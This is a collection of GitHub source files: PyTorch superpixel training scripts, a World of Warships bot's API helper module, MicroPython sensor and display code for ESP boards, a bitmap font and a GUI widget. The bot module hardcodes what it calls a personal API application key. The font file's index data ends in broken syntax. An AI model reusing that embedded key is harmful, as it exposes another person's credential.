augmentation.Compose([augmentation.RandomHorizontalFlip(), augmentation.RandomScale(), augmentation.RandomCrop()]) train_dataset = bsds.BSDS(cfg.root, geo_transforms=augment) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = bsds.BSDS(cfg.root, split="val") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 max_val_asa = 0 writer = SummaryWriter(log_dir='log', comment='traininglog') while iterations < cfg.train_iter: for data in train_loader: iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.color_scale, cfg.pos_scale, device) meter.add(metric) state = meter.state(f"[{iterations}/{cfg.train_iter}]") print(state) # return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(),"uniform:":uniform_compactness.item()} writer.add_scalar("comprehensive/loss", 
metric["loss"], iterations) writer.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) writer.add_scalar("loss/compact_loss", metric["compact"], iterations) if (iterations % cfg.test_interval) == 0: asa = eval(model, test_loader, cfg.color_scale, cfg.pos_scale, device) print(f"validation asa {asa}") writer.add_scalar("comprehensive/asa",asa,iterations) if asa > max_val_asa: max_val_asa = asa torch.save(model.state_dict(), os.path.join(cfg.out_dir, "bset_model_sp_test.pth")) if iterations == cfg.train_iter: break unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model"+unique_id+".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str,default='../BSR', help="/path/to/BSR") parser.add_argument("--out_dir", default="./log", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=12, type=int) parser.add_argument("--nworkers", default=4, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr",default=1e-4, type=float, help="learning rate") parser.add_argument("--train_iter", default=200000, type=int) parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=5, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels") parser.add_argument("--color_scale", default=0.26, type=float) parser.add_argument("--pos_scale", default=2.5, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: aabbcco/ssn-3d-pytorch/train_shapenetx.py ```python import os import numpy as np import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter from datetime import datetime from lib.utils.meter import Meter from lib.ssn.ssn import soft_slic_pknn from models.model_ptnet import PointNet_SSNx from lib.dataset import shapenet from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse from lib.utils.pointcloud_io import CalAchievableSegAccSingle, CalUnderSegErrSingle @torch.no_grad() def eval(model, loader, pos_scale, device): model.eval() # change the mode of model to eval sum_asa = 0 sum_usa = 0 cnt = 0 for data in loader: cnt += 1 inputs, _, labels_num = data # b*c*npoint inputs = inputs.to(device) # b*c*w*h # labels = labels.to(device) # sematic_lable inputs = pos_scale * inputs # calculation,return affinity,hard lable,feature tensor _, H, _, _ = model(inputs) H = H.squeeze(0).to("cpu").detach().numpy() labels_num = labels_num.squeeze(0).numpy() asa = CalAchievableSegAccSingle(H, labels_num) usa = CalUnderSegErrSingle(H, labels_num) sum_asa += asa sum_usa += usa if (100 == cnt): break model.train() asaa = sum_asa / 100.0 usaa = sum_usa / 100.0 strs = "[test]:asa: {:.5f},ue: {:.5f}".format(asaa, usaa) print(strs) return asaa, usaa # cal asa def update_param(data, model, optimizer, compactness, pos_scale, device): inputs, labels, _ = data inputs = inputs.to(device) labels = labels.to(device) inputs = pos_scale * inputs Q, H, _, _ = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, inputs, H) #uniform_compactness = 
uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss optimizer.zero_grad() # clear previous grad loss.backward() # cal the grad optimizer.step() # backprop return { "loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(), "lr": optimizer.state_dict()['param_groups'][0]['lr'] } def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = PointNet_SSNx(cfg.fdim, cfg.nspix, cfg.niter, backend=soft_slic_pknn).to(device) optimizer = optim.Adam(model.parameters(), cfg.lr) decayer = optim.lr_scheduler.StepLR(optimizer, 2, 0.95) train_dataset = shapenet.shapenet(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = shapenet.shapenet(cfg.root, split="test") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 writer = SummaryWriter(log_dir=args.out_dir, comment='traininglog') for epoch_idx in range(cfg.train_epoch): batch_iterations = 0 for data in train_loader: batch_iterations += 1 iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device) meter.add(metric) state = meter.state( f"[{batch_iterations},{epoch_idx}/{cfg.train_epoch}]") print(state) addscaler(metric, writer, iterations) if (iterations % 200) == 0: test_res = eval(model, test_loader, cfg.pos_scale, device) addscaler(test_res, writer, iterations, True) if (iterations % 1000) == 0: (asa, usa) = test_res strs = "ep_{:}_batch_{:}_iter_{:}_asa_{:.3f}_ue_{:.3f}.pth".format( epoch_idx, batch_iterations, iterations, asa, usa) torch.save( model.state_dict(), os.path.join(args.out_dir, strs)) decayer.step() unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) def addscaler(metric, scalarWriter, iterations, test=False): if not test: scalarWriter.add_scalar("comprehensive/loss", metric["loss"], iterations) scalarWriter.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) scalarWriter.add_scalar("loss/compact_loss", metric["compact"], iterations) scalarWriter.add_scalar("lr", metric["lr"], iterations) else: (asa, usa) = metric scalarWriter.add_scalar("eval/asa", asa, iterations) scalarWriter.add_scalar("eval/ue", usa, iterations) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_part_seg_hdf5_data', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="../ssn-logs/pointnetx-pknn-", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=20, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=3e-5, type=float, help="learning rate") parser.add_argument("--train_epoch", default=100, type=int) parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) 
parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() date = datetime.now() os.makedirs(args.out_dir, exist_ok=True) train(args) ```
{ "source": "aabbcco/wows_bot", "score": 2 }
#### File: wows_bot/libs/network_basic.py
```python
from logging import exception
import httpx
import asyncio
from nonebot import get_driver
from pydantic.utils import unique_list


async def PostRequestAsync(dest):
    try:
        async with httpx.AsyncClient() as client:
            resp = await client.get(dest)
            resp.raise_for_status()
    except httpx.HTTPError as exc:
        print(f'HTTP Exception for {exc.request.url} - {exc}')
    res = resp.json()
    if res['status'] == 'error':
        raise Exception(res['error']['code'], res['error']['message'])
    return res['data']


async def GetShipInfo(server: str, ship_id: str, language='zh-cn'):
    url = WowsRequestGenerater(server, ['encyclopedia', 'ships'], {"ship_id": ship_id, 'language': language})
    res = await PostRequestAsync(url)
    return res[ship_id]['name']


async def GetTargetIdByRequest(server: str, field: str, name: str) -> str:
    assert field in ['clans', 'account']
    url = WowsRequestGenerater(server, [field, 'list'], {'search': name})
    res = await PostRequestAsync(url)
    return (
        res[0]['clan_id']
        if field == 'clans'
        else res[0]['account_id']
    )


async def GetAllMapInfo(server: str):
    url = WowsRequestGenerater(server, ['encyclopedia', 'battlearenas'], {'language': 'zh-cn'})
    mapinfo = await PostRequestAsync(url)
    mapdata = {}
    for key, value in mapinfo['data'].items():
        mapdata[value['name']] = {'map_id': value['battle_arena_id'],
                                  'description': value['description'],
                                  'icon': value['icon']}
    return mapdata


async def GetPersonalInfo(server: str, name: str):
    id = str(await GetTargetIdByRequest(server, 'account', name))
    url = WowsRequestGenerater(server, ['account', 'info'], {'account_id': id})
    personalinfo = (await PostRequestAsync(url))[id]
    if personalinfo['hidden_profile'] == True:
        # raise a real exception type; logging.exception() is a logging call, not an Exception class
        raise Exception('hidden profile')
    pvp = personalinfo['statistics']['pvp']
    return {
        'account_id': personalinfo['account_id'],
        'created_at': personalinfo['created_at'],
        'updated_at': personalinfo['updated_at'],
        'battles': pvp['battles'],
        'survive_rate': pvp['survived_battles'] / pvp['battles'],
        'kd': pvp['frags'] / (pvp['battles'] - pvp['survived_battles']),
        'winrate': pvp['wins'] / pvp['battles']
    }


async def GetClanInfo(server: str, name: str):
    if name.isdigit():
        id = name
    else:
        id = await GetTargetIdByRequest(server, 'clans', name)
    id = str(id)
    url = WowsRequestGenerater(server, ['clans', 'info'], {'clan_id': id})
    claninfo = (await PostRequestAsync(url))[id]
    return {
        'name': claninfo['name'],
        'members_count': claninfo['members_count'],
        'creator_name': claninfo['creator_name'],
        'clan_id': claninfo['clan_id'],
        'updated_at': claninfo['updated_at'],
        'leader_name': claninfo['leader_name'],
        'tag': claninfo['tag'],
        #'description': claninfo['description'],
    }


# http(s)://<server>/<API_name>/<method block>/<method name>/?<get params>
def WowsRequestGenerater(server: str, api: list, func: dict) -> str:
    assert (server in ['com', 'asia', 'eu', 'ru']), 'server invalid'
    url = 'https://api.worldofwarships.{:}/wows/'.format(server)
    for _, key in enumerate(api):
        url += '{:}/'.format(key)
    try:
        # appkey = get_driver().config.wargamingappkey
        appkey = '41eea5422846e9db1871963330a1ae04'  # personal key will delete after release
    except:
        raise Exception('key error')
    url += '?application_id={:s}'.format(appkey)
    for ele in func.keys():
        url += '&{:}={:}'.format(ele, func[ele])
    return url
```
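A hedged usage sketch for the helpers above — the server, the clan tag and the import path are illustrative assumptions, and a valid Wargaming `application_id` plus network access are needed for the call to succeed:

```python
import asyncio

from libs.network_basic import GetClanInfo, WowsRequestGenerater  # import path assumed

async def demo():
    # builds https://api.worldofwarships.asia/wows/clans/list/?application_id=...&search=TAG
    print(WowsRequestGenerater('asia', ['clans', 'list'], {'search': 'TAG'}))
    info = await GetClanInfo('asia', 'TAG')        # 'TAG' is a made-up clan tag
    print(info['name'], info['members_count'])

asyncio.run(demo())
```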
{ "source": "aabbtree77/esp12e-usb2ttl-ds18b20-dht11", "score": 3 }
#### File: aabbtree77/esp12e-usb2ttl-ds18b20-dht11/test.py
```python
import machine
import ds18x20
import onewire
import time
import dht

#ds18x20
def rom_to_hex(rom):
    """Convert rom bytearray to hex string."""
    return ''.join('{:02x}'.format(x) for x in rom)

ds = ds18x20.DS18X20(onewire.OneWire(machine.Pin(2)))

def read_ds18b20():
    ds.convert_temp()
    time.sleep_ms(1000)
    tdict = {rom_to_hex(rom): ds.read_temp(rom) for rom in ds.scan()}
    tval = list(tdict.values())
    return int(tval[0])

#DHT11
dht_sensor = dht.DHT11(machine.Pin(4))

def read_dht11():
    dht_sensor.measure()
    time.sleep_ms(2000)
    return (dht_sensor.temperature(), dht_sensor.humidity())

#Heat output, on/off reversed!!! On means inactive, LED=0.
pin_heat = machine.Pin(13, machine.Pin.OUT)
pin_heat.on()

T_ds18b20 = 0
T_dht11 = 0
H_dht11 = 0

#Set to True to check if the board is responding (blinking LED)
while False:
    pin_heat.off()
    time.sleep_ms(1000)
    pin_heat.on()
    time.sleep_ms(1000)

while True:
    try:
        T_ds18b20 = read_ds18b20()
    except Exception as e:
        print("Ignoring DS18b20 error, code {}.".format(e))

    try:
        T_dht11, H_dht11 = read_dht11()
    except Exception as e:
        print("Ignoring DHT11 error, code {}.".format(e))

    if T_ds18b20 > T_dht11:
        pin_heat.off()
    else:
        pin_heat.on()

    #time.sleep_ms(10000)
    print(T_ds18b20, T_dht11, H_dht11, pin_heat.value())
```
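A small variation sketch on the one-wire pattern used by `read_ds18b20()` above: returning every DS18B20 on the bus keyed by its ROM id instead of only the first reading. It reuses `ds`, `time` and `rom_to_hex` from the script, and the example output is made up:

```python
def read_all_ds18b20():
    ds.convert_temp()
    time.sleep_ms(750)  # a 12-bit DS18B20 conversion can take up to 750 ms
    return {rom_to_hex(rom): ds.read_temp(rom) for rom in ds.scan()}

# e.g. {'28ff641f8016043e': 21.5, '28ff0a2c80160455': 22.0}
```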
{ "source": "aabbtree77/esp32-mqtt-experiments", "score": 2 }
#### File: gui/fonts/arial10.py ```python version = '0.25' def height(): return 10 def max_width(): return 11 def hmap(): return True def reverse(): return False def monospaced(): return False def min_ch(): return 32 def max_ch(): return 126 _font =\ b'\x06\x00\x70\x88\x08\x10\x20\x20\x00\x20\x00\x00\x03\x00\x00\x00'\ b'\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x80\x80\x80\x80\x80\x80'\ b'\x00\x80\x00\x00\x04\x00\xa0\xa0\xa0\x00\x00\x00\x00\x00\x00\x00'\ b'\x06\x00\x28\x28\xf8\x50\x50\xf8\xa0\xa0\x00\x00\x06\x00\x70\xa8'\ b'\xa0\x70\x28\x28\xa8\x70\x20\x00\x0a\x00\x62\x00\x94\x00\x94\x00'\ b'\x68\x00\x0b\x00\x14\x80\x14\x80\x23\x00\x00\x00\x00\x00\x07\x00'\ b'\x30\x48\x48\x30\x50\x8c\x88\x74\x00\x00\x02\x00\x80\x80\x80\x00'\ b'\x00\x00\x00\x00\x00\x00\x04\x00\x20\x40\x80\x80\x80\x80\x80\x80'\ b'\x40\x20\x04\x00\x80\x40\x20\x20\x20\x20\x20\x20\x40\x80\x04\x00'\ b'\x40\xe0\x40\xa0\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x20\x20'\ b'\xf8\x20\x20\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x80'\ b'\x80\x80\x04\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x03\x00'\ b'\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x03\x00\x20\x20\x40\x40'\ b'\x40\x40\x80\x80\x00\x00\x06\x00\x70\x88\x88\x88\x88\x88\x88\x70'\ b'\x00\x00\x06\x00\x20\x60\xa0\x20\x20\x20\x20\x20\x00\x00\x06\x00'\ b'\x70\x88\x08\x08\x10\x20\x40\xf8\x00\x00\x06\x00\x70\x88\x08\x30'\ b'\x08\x08\x88\x70\x00\x00\x06\x00\x10\x30\x50\x50\x90\xf8\x10\x10'\ b'\x00\x00\x06\x00\x78\x40\x80\xf0\x08\x08\x88\x70\x00\x00\x06\x00'\ b'\x70\x88\x80\xf0\x88\x88\x88\x70\x00\x00\x06\x00\xf8\x10\x10\x20'\ b'\x20\x40\x40\x40\x00\x00\x06\x00\x70\x88\x88\x70\x88\x88\x88\x70'\ b'\x00\x00\x06\x00\x70\x88\x88\x88\x78\x08\x88\x70\x00\x00\x03\x00'\ b'\x00\x00\x80\x00\x00\x00\x00\x80\x00\x00\x03\x00\x00\x00\x80\x00'\ b'\x00\x00\x00\x80\x80\x80\x06\x00\x00\x00\x08\x70\x80\x70\x08\x00'\ b'\x00\x00\x06\x00\x00\x00\x00\xf8\x00\xf8\x00\x00\x00\x00\x06\x00'\ b'\x00\x00\x80\x70\x08\x70\x80\x00\x00\x00\x06\x00\x70\x88\x08\x10'\ b'\x20\x20\x00\x20\x00\x00\x0b\x00\x1f\x00\x60\x80\x4d\x40\x93\x40'\ b'\xa2\x40\xa2\x40\xa6\x80\x9b\x00\x40\x40\x3f\x80\x08\x00\x10\x28'\ b'\x28\x28\x44\x7c\x82\x82\x00\x00\x07\x00\xf8\x84\x84\xfc\x84\x84'\ b'\x84\xf8\x00\x00\x07\x00\x38\x44\x80\x80\x80\x80\x44\x38\x00\x00'\ b'\x07\x00\xf0\x88\x84\x84\x84\x84\x88\xf0\x00\x00\x06\x00\xf8\x80'\ b'\x80\xf8\x80\x80\x80\xf8\x00\x00\x06\x00\xf8\x80\x80\xf0\x80\x80'\ b'\x80\x80\x00\x00\x08\x00\x38\x44\x82\x80\x8e\x82\x44\x38\x00\x00'\ b'\x07\x00\x84\x84\x84\xfc\x84\x84\x84\x84\x00\x00\x02\x00\x80\x80'\ b'\x80\x80\x80\x80\x80\x80\x00\x00\x05\x00\x10\x10\x10\x10\x10\x90'\ b'\x90\x60\x00\x00\x07\x00\x84\x88\x90\xb0\xd0\x88\x88\x84\x00\x00'\ b'\x06\x00\x80\x80\x80\x80\x80\x80\x80\xf8\x00\x00\x08\x00\x82\xc6'\ b'\xc6\xaa\xaa\xaa\x92\x92\x00\x00\x07\x00\x84\xc4\xa4\xa4\x94\x94'\ b'\x8c\x84\x00\x00\x08\x00\x38\x44\x82\x82\x82\x82\x44\x38\x00\x00'\ b'\x06\x00\xf0\x88\x88\x88\xf0\x80\x80\x80\x00\x00\x08\x00\x38\x44'\ b'\x82\x82\x82\x9a\x44\x3e\x00\x00\x07\x00\xf8\x84\x84\xf8\x90\x88'\ b'\x88\x84\x00\x00\x07\x00\x78\x84\x80\x60\x18\x04\x84\x78\x00\x00'\ b'\x06\x00\xf8\x20\x20\x20\x20\x20\x20\x20\x00\x00\x07\x00\x84\x84'\ b'\x84\x84\x84\x84\x84\x78\x00\x00\x08\x00\x82\x82\x44\x44\x28\x28'\ b'\x10\x10\x00\x00\x0b\x00\x84\x20\x8a\x20\x4a\x40\x4a\x40\x51\x40'\ b'\x51\x40\x20\x80\x20\x80\x00\x00\x00\x00\x07\x00\x84\x48\x48\x30'\ b'\x30\x48\x48\x84\x00\x00\x08\x00\x82\x44\x44\x28\x10\x10\x10\x10'\ b'\x00\x00\x07\x00\x7c\x08\x10\x10\x20\x20\x40\xfc\x00\x00\x03\x00'\ 
b'\xc0\x80\x80\x80\x80\x80\x80\x80\x80\xc0\x03\x00\x80\x80\x40\x40'\ b'\x40\x40\x20\x20\x00\x00\x03\x00\xc0\x40\x40\x40\x40\x40\x40\x40'\ b'\x40\xc0\x05\x00\x20\x50\x50\x88\x00\x00\x00\x00\x00\x00\x06\x00'\ b'\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x00\x04\x00\x80\x40\x00\x00'\ b'\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x70\x88\x78\x88\x98\xe8'\ b'\x00\x00\x06\x00\x80\x80\xb0\xc8\x88\x88\xc8\xb0\x00\x00\x06\x00'\ b'\x00\x00\x70\x88\x80\x80\x88\x70\x00\x00\x06\x00\x08\x08\x68\x98'\ b'\x88\x88\x98\x68\x00\x00\x06\x00\x00\x00\x70\x88\xf8\x80\x88\x70'\ b'\x00\x00\x04\x00\x20\x40\xe0\x40\x40\x40\x40\x40\x00\x00\x06\x00'\ b'\x00\x00\x68\x98\x88\x88\x98\x68\x08\xf0\x06\x00\x80\x80\xb0\xc8'\ b'\x88\x88\x88\x88\x00\x00\x02\x00\x80\x00\x80\x80\x80\x80\x80\x80'\ b'\x00\x00\x02\x00\x40\x00\x40\x40\x40\x40\x40\x40\x40\x80\x05\x00'\ b'\x80\x80\x90\xa0\xc0\xe0\xa0\x90\x00\x00\x02\x00\x80\x80\x80\x80'\ b'\x80\x80\x80\x80\x00\x00\x08\x00\x00\x00\xbc\xd2\x92\x92\x92\x92'\ b'\x00\x00\x06\x00\x00\x00\xf0\x88\x88\x88\x88\x88\x00\x00\x06\x00'\ b'\x00\x00\x70\x88\x88\x88\x88\x70\x00\x00\x06\x00\x00\x00\xb0\xc8'\ b'\x88\x88\xc8\xb0\x80\x80\x06\x00\x00\x00\x68\x98\x88\x88\x98\x68'\ b'\x08\x08\x04\x00\x00\x00\xa0\xc0\x80\x80\x80\x80\x00\x00\x06\x00'\ b'\x00\x00\x70\x88\x60\x10\x88\x70\x00\x00\x03\x00\x40\x40\xe0\x40'\ b'\x40\x40\x40\x60\x00\x00\x06\x00\x00\x00\x88\x88\x88\x88\x98\x68'\ b'\x00\x00\x06\x00\x00\x00\x88\x88\x50\x50\x20\x20\x00\x00\x0a\x00'\ b'\x00\x00\x00\x00\x88\x80\x94\x80\x55\x00\x55\x00\x22\x00\x22\x00'\ b'\x00\x00\x00\x00\x06\x00\x00\x00\x88\x50\x20\x20\x50\x88\x00\x00'\ b'\x06\x00\x00\x00\x88\x88\x50\x50\x20\x20\x20\x40\x06\x00\x00\x00'\ b'\xf8\x10\x20\x20\x40\xf8\x00\x00\x04\x00\x20\x40\x40\x40\x80\x40'\ b'\x40\x40\x40\x20\x02\x00\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80'\ b'\x04\x00\x80\x40\x40\x40\x20\x40\x40\x40\x40\x80\x06\x00\x00\x00'\ b'\x00\xe8\xb0\x00\x00\x00\x00\x00' _index =\ b'\x00\x00\x0c\x00\x0c\x00\x18\x00\x18\x00\x24\x00\x24\x00\x30\x00'\ b'\x30\x00\x3c\x00\x3c\x00\x48\x00\x48\x00\x5e\x00\x5e\x00\x6a\x00'\ b'\x6a\x00\x76\x00\x76\x00\x82\x00\x82\x00\x8e\x00\x8e\x00\x9a\x00'\ b'\x9a\x00\xa6\x00\xa6\x00\xb2\x00\xb2\x00\xbe\x00\xbe\x00\xca\x00'\ b'\xca\x00\xd6\x00\xd6\x00\xe2\x00\xe2\x00\xee\x00\xee\x00\xfa\x00'\ b'\xfa\x00\x06\x01\x06\x01\x12\x01\x12\x01\x1e\x01\x1e\x01\x2a\x01'\ b'\x2a\x01\x36\x01\x36\x01\x42\x01\x42\x01\x4e\x01\x4e\x01\x5a\x01'\ b'\x5a\x01\x66\x01\x66\x01\x72\x01\x72\x01\x7e\x01\x7e\x01\x8a\x01'\ b'\x8a\x01\x96\x01\x96\x01\xac\x01\xac\x01\xb8\x01\xb8\x01\xc4\x01'\ b'\xc4\x01\xd0\x01\xd0\x01\xdc\x01\xdc\x01\xe8\x01\xe8\x01\xf4\x01'\ b'\xf4\x01\x00\x02\x00\x02\x0c\x02\x0c\x02\x18\x02\x18\x02\x24\x02'\ b'\x24\x02\x30\x02\x30\x02\x3c\x02\x3c\x02\x48\x02\x48\x02\x54\x02'\ b'\x54\x02\x60\x02\x60\x02\x6c\x02\x6c\x02\x78\x02\x78\x02\x84\x02'\ b'\x84\x02\x90\x02\x90\x02\x9c\x02\x9c\x02\xa8\x02\xa8\x02\xb4\x02'\ b'\xb4\x02\xca\x02\xca\x02\xd6\x02\xd6\x02\xe2\x02\xe2\x02\xee\x02'\ b'\xee\x02\xfa\x02\xfa\x02\x06\x03\x06\x03\x12\x03\x12\x03\x1e\x03'\ b'\x1e\x03\x2a\x03\x2a\x03\x36\x03\x36\x03\x42\x03\x42\x03\x4e\x03'\ b'\x4e\x03\x5a\x03\x5a\x03\x66\x03\x66\x03\x72\x03\x72\x03\x7e\x03'\ b'\x7e\x03\x8a\x03\x8a\x03\x96\x03\x96\x03\xa2\x03\xa2\x03\xae\x03'\ b'\xae\x03\xba\x03\xba\x03\xc6\x03\xc6\x03\xd2\x03\xd2\x03\xde\x03'\ b'\xde\x03\xea\x03\xea\x03\xf6\x03\xf6\x03\x02\x04\x02\x04\x0e\x04'\ b'\x0e\x04\x1a\x04\x1a\x04\x26\x04\x26\x04\x32\x04\x32\x04\x3e\x04'\ b'\x3e\x04\x54\x04\x54\x04\x60\x04\x60\x04\x6c\x04\x6c\x04\x78\x04'\ 
b'\x78\x04\x84\x04\x84\x04\x90\x04\x90\x04\x9c\x04\x9c\x04\xa8\x04'\ _mvfont = memoryview(_font) def get_ch(ch): ordch = ord(ch) ordch = ordch + 1 if ordch >= 32 and ordch <= 126 else 32 idx_offs = 4 * (ordch - 32) offset = int.from_bytes(_index[idx_offs : idx_offs + 2], 'little') next_offs = int.from_bytes(_index[idx_offs + 2 : idx_offs + 4], 'little') width = int.from_bytes(_font[offset:offset + 2], 'little') return _mvfont[offset + 2:next_offs], 10, width ``` #### File: gui/widgets/scale.py ```python from gui.core.nanogui import DObject from gui.core.writer import Writer from gui.core.colors import BLACK class Scale(DObject): def __init__(self, writer, row, col, *, ticks=200, legendcb=None, tickcb=None, height=0, width=100, bdcolor=None, fgcolor=None, bgcolor=None, pointercolor=None, fontcolor=None): if ticks % 2: raise ValueError('ticks arg must be divisible by 2') self.ticks = ticks self.tickcb = tickcb def lcb(f): return '{:3.1f}'.format(f) self.legendcb = legendcb if legendcb is not None else lcb bgcolor = BLACK if bgcolor is None else bgcolor text_ht = writer.font.height() ctrl_ht = 12 # Minimum height for ticks # Add 2 pixel internal border to give a little more space min_ht = text_ht + 6 # Ht of text, borders and gap between text and ticks if height < min_ht + ctrl_ht: height = min_ht + ctrl_ht # min workable height else: ctrl_ht = height - min_ht # adjust ticks for greater height width &= 0xfffe # Make divisible by 2: avoid 1 pixel pointer offset super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor) self.fontcolor = fontcolor if fontcolor is not None else self.fgcolor self.x0 = col + 2 self.x1 = col + self.width - 2 self.y0 = row + 2 self.y1 = row + self.height - 2 self.ptrcolor = pointercolor if pointercolor is not None else self.fgcolor # Define tick dimensions ytop = self.y0 + text_ht + 2 # Top of scale graphic (2 pixel gap) ycl = ytop + (self.y1 - ytop) // 2 # Centre line self.sdl = round(ctrl_ht * 1 / 3) # Length of small tick. self.sdy0 = ycl - self.sdl // 2 self.mdl = round(ctrl_ht * 2 / 3) # Medium tick self.mdy0 = ycl - self.mdl // 2 self.ldl = ctrl_ht # Large tick self.ldy0 = ycl - self.ldl // 2 def show(self): wri = self.writer dev = self.device x0: int = self.x0 # Internal rectangle occupied by scale and text x1: int = self.x1 y0: int = self.y0 y1: int = self.y1 dev.fill_rect(x0, y0, x1 - x0, y1 - y0, self.bgcolor) super().show() # Scale is drawn using ints. Each division is 10 units. val: int = self._value # 0..ticks*10 # iv increments for each tick. Its value modulo N determines tick length iv: int # val / 10 at a tick position d: int # val % 10: offset relative to a tick position fx: int # X offset of current tick in value units if val >= 100: # Whole LHS of scale will be drawn iv, d = divmod(val - 100, 10) # Initial value fx = 10 - d iv += 1 else: # Scale will scroll right iv = 0 fx = 100 - val # Window shows 20 divisions, each of which corresponds to 10 units of value. 
# So pixels per unit value == win_width/200 win_width: int = x1 - x0 ticks: int = self.ticks # Total # of ticks visible and hidden while True: x: int = x0 + (fx * win_width) // 200 # Current X position ys: int # Start Y position for tick yl: int # tick length if x > x1 or iv > ticks: # Out of space or data (scroll left) break if not iv % 10: txt = self.legendcb(self._fvalue(iv * 10)) tlen = wri.stringlen(txt) Writer.set_textpos(dev, y0, min(x, x1 - tlen)) wri.setcolor(self.fontcolor, self.bgcolor) wri.printstring(txt) wri.setcolor() ys = self.ldy0 # Large tick yl = self.ldl elif not iv % 5: ys = self.mdy0 yl = self.mdl else: ys = self.sdy0 yl = self.sdl if self.tickcb is None: color = self.fgcolor else: color = self.tickcb(self._fvalue(iv * 10), self.fgcolor) dev.vline(x, ys, yl, color) # Draw tick fx += 10 iv += 1 dev.vline(x0 + (x1 - x0) // 2, y0, y1 - y0, self.ptrcolor) # Draw pointer def _to_int(self, v): return round((v + 1.0) * self.ticks * 5) # 0..self.ticks*10 def _fvalue(self, v=None): return v / (5 * self.ticks) - 1.0 def value(self, val=None): # User method to get or set value if val is not None: val = min(max(val, - 1.0), 1.0) v = self._to_int(val) if v != self._value: self._value = v self.show() return self._fvalue(self._value) ``` #### File: esp32-mqtt-experiments/minihinch/test_ssd_dht_async.py ```python import uasyncio as asyncio import machine import dht from color_setup import ssd # On a monochrome display Writer is more efficient than CWriter. from gui.core.writer import Writer from gui.core.nanogui import refresh from gui.widgets.label import Label import gui.fonts.freesans20 as freesans20 import gui.fonts.arial35 as arial35 PROG_STATE = {} PROG_STATE['temperature'] = 99 PROG_STATE['humidity'] = 77 PROG_STATE['output1'] = 0 GLOB_PINOUT1 = machine.Pin(1, machine.Pin.OUT) async def display_outputs(): global PROG_STATE #ssd.fill(0) #refresh(ssd) Writer.set_textpos(ssd, 0, 0) # In case previous tests have altered it wri_val = Writer(ssd, arial35, verbose=False) wri_val.set_clip(False, False, False) wri_aux = Writer(ssd, freesans20, verbose=False) wri_aux.set_clip(False, False, False) field_val = Label(wri_val, 27, 2, wri_val.stringlen('-23.0C')) field_aux = Label(wri_aux, 0, 2, wri_aux.stringlen('Output: 0')) while True: for it in (0,1): #refresh(ssd) if it == 0: field_val.value('{:2.1f}C'.format(PROG_STATE['temperature'])) elif it==1: field_val.value('{:2.1f}%'.format(PROG_STATE['humidity'])) else: field_val.value('{}'.format('Should be unreachable.')) field_aux.value('Output: {}'.format(PROG_STATE['output1'])) await asyncio.sleep_ms(3000) refresh(ssd) #ssd.fill(0) #It is vital to fill with zeros here in this precise order! async def report_dht_data(sensor): global PROG_STATE n = 0 while True: #PROG_STATE['temperature'] = n #PROG_STATE['humidity'] = n+1 try: sensor.measure() PROG_STATE['temperature'] = sensor.temperature() PROG_STATE['humidity'] = sensor.humidity() #PROG_STATE['temperature'] = 55 #PROG_STATE['humidity'] = 33 await asyncio.sleep(1) except Exception as ex: PROG_STATE['temperature'] = n PROG_STATE['humidity'] = n n = n + 1 await asyncio.sleep(1) continue async def main(): global GLOB_PINOUT1 global PROG_STATE while True: GLOB_PINOUT1.on() PROG_STATE['output1'] = 1 await asyncio.sleep(1) GLOB_PINOUT1.off() PROG_STATE['output1'] = 0 